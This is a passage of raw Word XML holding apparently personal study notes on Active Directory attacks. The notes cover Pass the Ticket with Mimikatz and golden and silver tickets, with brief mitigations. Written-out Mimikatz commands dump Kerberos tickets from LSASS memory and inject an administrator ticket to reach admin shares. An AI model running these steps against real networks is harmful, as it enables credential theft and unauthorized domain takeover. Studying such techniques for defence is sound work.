          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>strong password policy</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31AAA7B4" w14:textId="0192E67E" w:rsidR="0044164B" w:rsidRPr="0084205E" w:rsidRDefault="0044164B" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="35"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>don’t turn off Kerberos Pre-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>Authen</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="7BA125B8" w14:textId="0076E2E5" w:rsidR="0044164B" w:rsidRPr="0084205E" w:rsidRDefault="0044164B" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="35"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve">Pass the Ticket with </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>Mimikatz</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="6BEB2662" w14:textId="260427C0" w:rsidR="0044164B" w:rsidRPr="0084205E" w:rsidRDefault="0044164B" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="35"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve">popular and powerful post-exploitation tool </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>most commonly used</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve"> for dumping user credentials inside of an AD network</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0875C499" w14:textId="6D11F4C1" w:rsidR="0044164B" w:rsidRPr="0084205E" w:rsidRDefault="0044164B" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="35"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>dump TGT from LSASS memory</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64E7896C" w14:textId="2C1A22DC" w:rsidR="0044164B" w:rsidRPr="0084205E" w:rsidRDefault="0044164B" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="35"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Pass the Ticket Overview</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CDC0941" w14:textId="171AD6F4" w:rsidR="0044164B" w:rsidRPr="0084205E" w:rsidRDefault="0044164B" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="35"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:lastRenderedPageBreak/>
        <w:t>dumping TGT from LSASS</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BB51286" w14:textId="1AD2C44A" w:rsidR="0044164B" w:rsidRPr="0084205E" w:rsidRDefault="0044164B" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="35"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>mimikatz</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve"> with </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>give .</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>kirbi</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve"> ticket which can be used to gain domain admin if domain admin ticket is in LSASS</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22C11CDB" w14:textId="577FE7BF" w:rsidR="0044164B" w:rsidRPr="0084205E" w:rsidRDefault="0044164B" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="35"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve">great for </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>privesc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve"> and lateral movement</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60EA6EDD" w14:textId="2BD08FF8" w:rsidR="0044164B" w:rsidRPr="0084205E" w:rsidRDefault="0044164B" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="35"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve">impersonate tickets using </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>mimikatz</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve"> PTT</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B2FE1CD" w14:textId="59BFE9CB" w:rsidR="0044164B" w:rsidRPr="0084205E" w:rsidRDefault="0044164B" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="35"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve">Prepare </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>Mimikatz</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve"> and Dump Tickets</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="327900FD" w14:textId="7784B49A" w:rsidR="0044164B" w:rsidRPr="0084205E" w:rsidRDefault="0044164B" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="35"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>on attacking machine</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39117EBE" w14:textId="71D5FE73" w:rsidR="0044164B" w:rsidRPr="0084205E" w:rsidRDefault="0044164B" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="35"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>mimikatz.exe</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="398F6B21" w14:textId="412C18E6" w:rsidR="0044164B" w:rsidRPr="0084205E" w:rsidRDefault="0044164B" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="35"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>privilege::</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>debug</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53C40E7D" w14:textId="7AD15AF7" w:rsidR="0044164B" w:rsidRPr="0084205E" w:rsidRDefault="0044164B" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="5"/>
          <w:numId w:val="35"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve">if 20 </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>ok</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="4C9BA2E7" w14:textId="26F80693" w:rsidR="0044164B" w:rsidRPr="0084205E" w:rsidRDefault="0044164B" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="6"/>
          <w:numId w:val="35"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve">have admin </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>priv</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve"> to run </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>mimikatz</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve"> properly</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14210847" w14:textId="468E6630" w:rsidR="0044164B" w:rsidRPr="0084205E" w:rsidRDefault="001B4AC4" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="35"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>sekurlsa</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>::</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>tickets /export</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FF30B57" w14:textId="2CAA73F3" w:rsidR="001B4AC4" w:rsidRPr="0084205E" w:rsidRDefault="001B4AC4" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="5"/>
          <w:numId w:val="35"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>will export tickets to directory currently in</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="222F0486" w14:textId="2C22F763" w:rsidR="001B4AC4" w:rsidRPr="0084205E" w:rsidRDefault="001B4AC4" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="35"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve">search for admin tickets from </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>krbtgt</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="547948B6" w14:textId="5D381956" w:rsidR="001B4AC4" w:rsidRPr="0084205E" w:rsidRDefault="00E9132F" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="35"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve">Pass the Ticket with </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>Mimikatz</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="4C30DBAC" w14:textId="43FEF1E0" w:rsidR="00E9132F" w:rsidRPr="0084205E" w:rsidRDefault="00E9132F" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="35"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>Kerberos::</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>ptt</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve"> &lt;ticket&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2691EC27" w14:textId="5B413F42" w:rsidR="00E9132F" w:rsidRPr="0084205E" w:rsidRDefault="00E9132F" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="35"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve">ex. </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>kerberos</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>::</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>ptt</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve"> [0;1e87bf]</w:t>
      </w:r>
      <w:hyperlink r:id="rId30" w:history="1">
        <w:r w:rsidRPr="0084205E">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>-2-0-40e10000-Administrator@krbtgt-CONTROLLER.LOCAL.kirbi</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="50DE67B1" w14:textId="12357741" w:rsidR="00E9132F" w:rsidRPr="0084205E" w:rsidRDefault="00E9132F" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="35"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>File</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>: :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve"> OK</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="282CA220" w14:textId="34F4D0CF" w:rsidR="00E9132F" w:rsidRPr="0084205E" w:rsidRDefault="00E9132F" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="35"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve">kill </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>mimikatz</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve"> and confirm success with </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>klist</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve"> command</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EFB635A" w14:textId="6D82A10B" w:rsidR="00E9132F" w:rsidRPr="0084205E" w:rsidRDefault="00E9132F" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="35"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>should get client: Administrator or client name of choosing</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47692260" w14:textId="5B00CA0E" w:rsidR="00E9132F" w:rsidRPr="0084205E" w:rsidRDefault="00E9132F" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="35"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>check admin share</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48545753" w14:textId="0C857727" w:rsidR="00E9132F" w:rsidRPr="0084205E" w:rsidRDefault="00E9132F" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="35"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>dir</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:hyperlink w:history="1">
        <w:r w:rsidRPr="0084205E">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>\\&lt;ip\admin$</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="7C35B490" w14:textId="76282800" w:rsidR="00E9132F" w:rsidRPr="0084205E" w:rsidRDefault="00E9132F" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="35"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Pass the Ticket Mitigation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D938ABF" w14:textId="5EFA2F8E" w:rsidR="00E9132F" w:rsidRPr="0084205E" w:rsidRDefault="00BF5502" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="35"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>don’t let domain admins log onto anything except the domain controller</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EFF50E6" w14:textId="0F9D1DE3" w:rsidR="00BF5502" w:rsidRPr="0084205E" w:rsidRDefault="00BF5502" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="35"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve">Golden/Silver Ticket Attacks with </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>Mimikatz</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="19903B53" w14:textId="50F252FC" w:rsidR="00BF5502" w:rsidRPr="0084205E" w:rsidRDefault="000146BA" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="35"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Silver tickets are relatively more discrete than golden tickets</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B665F71" w14:textId="201218E9" w:rsidR="000146BA" w:rsidRPr="0084205E" w:rsidRDefault="000146BA" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="35"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>approach to creating them is the same</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="715276C9" w14:textId="3899132B" w:rsidR="000146BA" w:rsidRPr="0084205E" w:rsidRDefault="000146BA" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="35"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>silver tickets are limited to service that is targeted</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63813CF3" w14:textId="4DD00CDA" w:rsidR="000146BA" w:rsidRPr="0084205E" w:rsidRDefault="000146BA" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="35"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>golden tickets have access to any Kerberos service</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4189F32B" w14:textId="12231BE7" w:rsidR="000146BA" w:rsidRPr="0084205E" w:rsidRDefault="000146BA" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="35"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve">find accessible service account to get foothold via </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>kerberoasting</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="67F23047" w14:textId="3C674573" w:rsidR="000146BA" w:rsidRPr="0084205E" w:rsidRDefault="000146BA" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="35"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve">then dump service hash and impersonate TGT </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>in order to</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve"> request a service ticket for the SQL service from KDC</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60E02292" w14:textId="4244FD45" w:rsidR="000146BA" w:rsidRPr="0084205E" w:rsidRDefault="000146BA" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="35"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>KRBTGT Overview</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BB51662" w14:textId="044D020A" w:rsidR="000146BA" w:rsidRPr="0084205E" w:rsidRDefault="000146BA" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="35"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>KRBTGT is the service account for KDC</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1953DA14" w14:textId="14BFED0E" w:rsidR="000146BA" w:rsidRPr="0084205E" w:rsidRDefault="000146BA" w:rsidP="0084205E">
      <w:pPr>
